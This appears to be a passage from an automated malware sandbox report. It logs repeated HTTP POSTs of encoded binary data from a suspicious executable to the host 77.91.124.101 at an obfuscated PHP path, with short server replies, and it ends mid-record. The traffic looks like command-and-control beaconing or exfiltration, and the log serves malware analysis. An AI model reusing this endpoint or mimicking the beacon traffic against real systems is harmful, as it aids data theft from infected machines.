                                                            Data Ascii: WPXQ^^_\]WUWU^W[PYXHVVW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*=X<(2R=# ;54:Y?3"V'1'%,;?->&G''^)
                                                            Nov 21, 2023 04:48:17.580379963 CET473INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:17 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 1f 26 3f 23 05 34 33 23 55 3c 3a 32 0b 2e 2e 25 1b 3f 20 29 11 32 3d 28 5f 27 29 3d 50 3c 2f 30 11 30 39 2c 51 37 18 0a 11 2a 20 21 5a 0c 1d 26 15 35 28 23 55 3c 07 3b 03 3c 2d 0e 5c 32 21 01 5c 2b 07 3f 16 34 0d 09 1f 31 0a 3b 0b 2f 59 21 5f 3a 01 2e 44 27 2c 31 01 34 17 23 5f 0c 14 27 18 35 0f 20 02 22 30 29 09 23 37 1a 14 23 37 27 1f 30 3d 0d 0e 26 5e 21 14 3c 38 38 52 31 09 06 51 27 29 2b 1d 31 00 23 13 3c 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "&?#43#U<:2..%? )2=(_')=P</009,Q7* !Z&5(#U<;<-\2!\+?41;/Y!_:.D',14#_'5 "0)#7#7'0=&^!<88R1Q')+1#<&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7677.91.124.10180192.168.2.549791C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:17.300045013 CET468OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:17.496331930 CET470INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.531966925 CET472OUTData Raw: 52 58 58 5c 5e 5e 5f 5d 5d 57 55 57 55 59 57 5a 50 58 58 45 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXX\^^_]]WUWUYWZPXXEVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;=+;.>8,'67:2(3&>-&#=,;<,8&G''^)
                                                            Nov 21, 2023 04:48:17.733270884 CET473INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:17 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            76192.168.2.54979177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:17.300045013 CET468OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:17.496331930 CET470INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:17.531966925 CET472OUTData Raw: 52 58 58 5c 5e 5e 5f 5d 5d 57 55 57 55 59 57 5a 50 58 58 45 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXX\^^_]]WUWUYWZPXXEVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;=+;.>8,'67:2(3&>-&#=,;<,8&G''^)
                                                            Nov 21, 2023 04:48:17.733270884 CET473INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:17 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7777.91.124.10180192.168.2.549792C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:18.050329924 CET474OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:18.251388073 CET474INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.251651049 CET477OUTData Raw: 52 5c 58 58 5b 5c 5f 5e 5d 57 55 57 55 59 57 50 50 5b 58 48 56 55 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\XX[\_^]WUWUYWPP[XHVUW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)^"(+>*?;76Z#)?R'-.Q' V->X<?+\,&G''^)
                                                            Nov 21, 2023 04:48:18.462958097 CET477INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            77192.168.2.54979277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:18.050329924 CET474OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:18.251388073 CET474INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.251651049 CET477OUTData Raw: 52 5c 58 58 5b 5c 5f 5e 5d 57 55 57 55 59 57 50 50 5b 58 48 56 55 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\XX[\_^]WUWUYWPP[XHVUW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)^"(+>*?;76Z#)?R'-.Q' V->X<?+\,&G''^)
                                                            Nov 21, 2023 04:48:18.462958097 CET477INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7877.91.124.10180192.168.2.549793C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:18.790292025 CET478OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:18.986663103 CET478INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.986892939 CET480OUTData Raw: 57 5c 58 50 5b 59 5f 5d 5d 57 55 57 55 56 57 5b 50 5f 58 41 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP[Y_]]WUWUVW[P_XAVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^=81^<+*V)3<8&Z#=+50=.$0&R9+]?,;Y/&G''^)
                                                            Nov 21, 2023 04:48:19.188397884 CET481INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            78192.168.2.54979377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:18.790292025 CET478OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:18.986663103 CET478INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:18.986892939 CET480OUTData Raw: 57 5c 58 50 5b 59 5f 5d 5d 57 55 57 55 56 57 5b 50 5f 58 41 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP[Y_]]WUWUVW[P_XAVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^=81^<+*V)3<8&Z#=+50=.$0&R9+]?,;Y/&G''^)
                                                            Nov 21, 2023 04:48:19.188397884 CET481INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:18 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            79192.168.2.54979477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:19.503804922 CET482OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:19.702590942 CET482INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:19.702955961 CET484OUTData Raw: 57 5a 5d 5c 5b 5e 5a 5a 5d 57 55 57 55 57 57 57 50 5c 58 41 56 5e 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZ]\[^ZZ]WUWUWWWP\XAV^WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*%^(+*',42#!_(0>P'-)'#99(*\?;/&G''^)
                                                            Nov 21, 2023 04:48:19.906702995 CET485INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:19 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7977.91.124.10180192.168.2.549794C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:19.503804922 CET482OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:19.702590942 CET482INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:19.702955961 CET484OUTData Raw: 57 5a 5d 5c 5b 5e 5a 5a 5d 57 55 57 55 57 57 57 50 5c 58 41 56 5e 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZ]\[^ZZ]WUWUWWWP\XAV^WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*%^(+*',42#!_(0>P'-)'#99(*\?;/&G''^)
                                                            Nov 21, 2023 04:48:19.906702995 CET485INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:19 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.2.54972077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:31.758867979 CET175OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:31.958381891 CET175INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:31.958623886 CET177OUTData Raw: 52 5f 58 59 5b 5c 5a 5d 5d 57 55 57 55 5f 57 55 50 53 58 49 56 53 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_XY[\Z]]WUWU_WUPSXIVSW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!X?9=#+.47&('=$ -,;-?<X;>&G''^)#
                                                            Nov 21, 2023 04:47:32.168170929 CET178INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            877.91.124.10180192.168.2.549720C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:31.758867979 CET175OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:31.958381891 CET175INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:31.958623886 CET177OUTData Raw: 52 5f 58 59 5b 5c 5a 5d 5d 57 55 57 55 5f 57 55 50 53 58 49 56 53 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_XY[\Z]]WUWU_WUPSXIVSW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!X?9=#+.47&('=$ -,;-?<X;>&G''^)#
                                                            Nov 21, 2023 04:47:32.168170929 CET178INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            80192.168.2.54979577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:20.236531973 CET486OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:20.434251070 CET486INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:20.434470892 CET488OUTData Raw: 52 5b 58 50 5e 58 5f 5a 5d 57 55 57 55 58 57 55 50 52 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[XP^X_Z]WUWUXWUPRXHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')1_?(:? '[8*^"9!]?Q'-!&#!-"]>,8>&G''^)?
                                                            Nov 21, 2023 04:48:20.636868000 CET489INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:20 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8077.91.124.10180192.168.2.549795C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:20.236531973 CET486OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:20.434251070 CET486INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:20.434470892 CET488OUTData Raw: 52 5b 58 50 5e 58 5f 5a 5d 57 55 57 55 58 57 55 50 52 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[XP^X_Z]WUWUXWUPRXHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')1_?(:? '[8*^"9!]?Q'-!&#!-"]>,8>&G''^)?
                                                            Nov 21, 2023 04:48:20.636868000 CET489INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:20 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            81192.168.2.54979677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:20.957691908 CET490OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:21.155589104 CET490INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:21.155800104 CET492OUTData Raw: 57 51 5d 5c 5b 5e 5a 5f 5d 57 55 57 55 5b 57 52 50 5b 58 41 56 5f 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
